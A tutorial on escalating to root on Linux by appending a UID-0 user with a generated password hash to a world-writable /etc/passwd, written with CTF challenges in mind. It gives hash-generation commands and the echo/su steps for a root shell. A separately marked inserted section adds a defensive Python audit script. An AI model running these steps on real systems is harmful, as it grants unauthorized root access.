Privilege Escalation on Linux/Unix Systems by Editing the /etc/passwd and /etc/shadow Files :

/etc/passwd file :

The /etc/passwd file stores essential user account information that is required during login. It is a plain text file containing one entry for each user or account on a computer running Linux or another Unix-like operating system. By default, the permissions on /etc/passwd make it world readable, that is, any user on the system can read it. Example :
 $ cat /etc/passwd
 pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
 nm-openvpn:x:117:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
 avahi:x:118:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
The file contains an entry for every user on the system. The fields are structured as follows :
 UserName | Password | UserID | GroupID | UserInformation | HomeDirectory | Shell
  • UserName is the user's login name, that is, the name a user types when logging into the system.
  • The Password field originally contained the hashed login password. For security reasons, the hashes are now kept in another file, /etc/shadow, that cannot be read by ordinary users. This field now merely contains the letter x to indicate that a password has been assigned to the user and is required for authentication. If this field is empty, the user can log in without a password.
  • UserID is the user's unique numeric identification number, which is used by the system for access control. Zero is reserved for the root account.
  • GroupID specifies the user's primary group identification number. This is usually the same as the user ID.
  • UserInformation is a comment field. It allows extra information about the user to be added, such as the full name, phone number, etc.
  • HomeDirectory is the full path of the user's home directory.
  • Shell is the full path of the user's default shell.

/etc/shadow file :

The actual password data is stored in a file called /etc/shadow. It does not contain passwords in plain text; rather, it contains password hashes. This file can only be read or edited by the root user.

In some cases, however, the /etc/passwd file is also writable by normal users (especially in some CTF challenges), and a normal user can then gain root access by manually editing the file.

Note: this method only works if /etc/passwd is readable and writable by all users. For example :
 $ ls -al /etc/passwd
 -rw-rw-rw- 1 root root 2364 Nov 16  2017 /etc/passwd
In this case, by appending a new user entry with UID 0 (root privileges) and a password hash to /etc/passwd, we are able to get a root shell.
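As an added, defender-side example (not part of the original post), here is a small Python audit that parses the seven-field layout described above and flags the conditions this technique relies on: an extra UID 0 account, a hash sitting in the password field instead of an x, an empty password field, and a file mode that is writable by group or others. The sample passwd content and its hash value are constructed for the example.

```python
import stat

# Constructed sample of /etc/passwd content (not from a real system): root, two
# service accounts, then two entries of the kind the text describes: a second
# UID-0 user carrying a hash in the password field, and an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:118:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
newroot:$6$salt$CONSTRUCTEDHASH:0:0:root:/root:/bin/bash
guest::1001:1001:Guest account,,,:/home/guest:/bin/sh
"""
FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text):
    """Split passwd text into one dict per entry, following the 7-field layout."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != len(FIELDS):
            entries.append({"line": lineno, "malformed": line})
            continue
        entry = dict(zip(FIELDS, fields))
        entry["line"] = lineno
        entries.append(entry)
    return entries

def audit_entries(entries):
    """Return (line, message) findings for entries that deviate from the norm."""
    findings = []
    for e in entries:
        if "malformed" in e:
            findings.append((e["line"], "malformed entry, expected 7 fields"))
            continue
        if e["uid"].isdigit() and int(e["uid"]) == 0 and e["name"] != "root":
            findings.append((e["line"], f"extra UID 0 account: {e['name']}"))
        if e["password"] == "":
            findings.append((e["line"], f"empty password field: {e['name']}"))
        elif e["password"] not in ("x", "*", "!"):
            # A hash here is used directly, bypassing /etc/shadow, as the text describes.
            findings.append((e["line"], f"hash stored in passwd: {e['name']}"))
    return findings

def group_or_world_writable(mode):
    """True if a stat mode grants write to group or others (the precondition above)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

if __name__ == "__main__":
    for line, msg in audit_entries(parse_passwd(SAMPLE_PASSWD)):
        print(f"sample line {line}: {msg}")
```

To run it against a live system, feed `open("/etc/passwd").read()` to parse_passwd and `os.stat("/etc/passwd").st_mode` to group_or_world_writable.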

Preparing the new user entry to append to the file : 

The root user's entry looks like this :
 root:x:0:0:root:/root:/bin/bash
Now we have to place our password hash in place of the x.

Creating the password hash :

There are many ways to create a password hash, for example :

With Python :
 $ python3 -c 'import crypt; print(crypt.crypt("password", "$6$salt"))'
where "password" is the password and "$6$salt" is the salt (the $6$ prefix selects SHA-512). Note that the crypt module was deprecated in Python 3.11 and removed in Python 3.13.

With mkpasswd :
 $ mkpasswd -m SHA-512 password

With OpenSSL:
 $ openssl passwd -1 -salt hack password123
Where :
  • -1 : MD5-based password algorithm (other options are -5 for SHA-256 and -6 for SHA-512),
  • -salt : the salt, here "hack"; the final argument, password123, is the password.
Now append the resulting entry to the /etc/passwd file :
 $ echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note : don't forget to put a backslash before every $ in the password field, otherwise the shell will try to expand it as a variable.

Now try to log in as our newly created user.
 $ su - newroot
 $ whoami
and that's it, we have a root shell.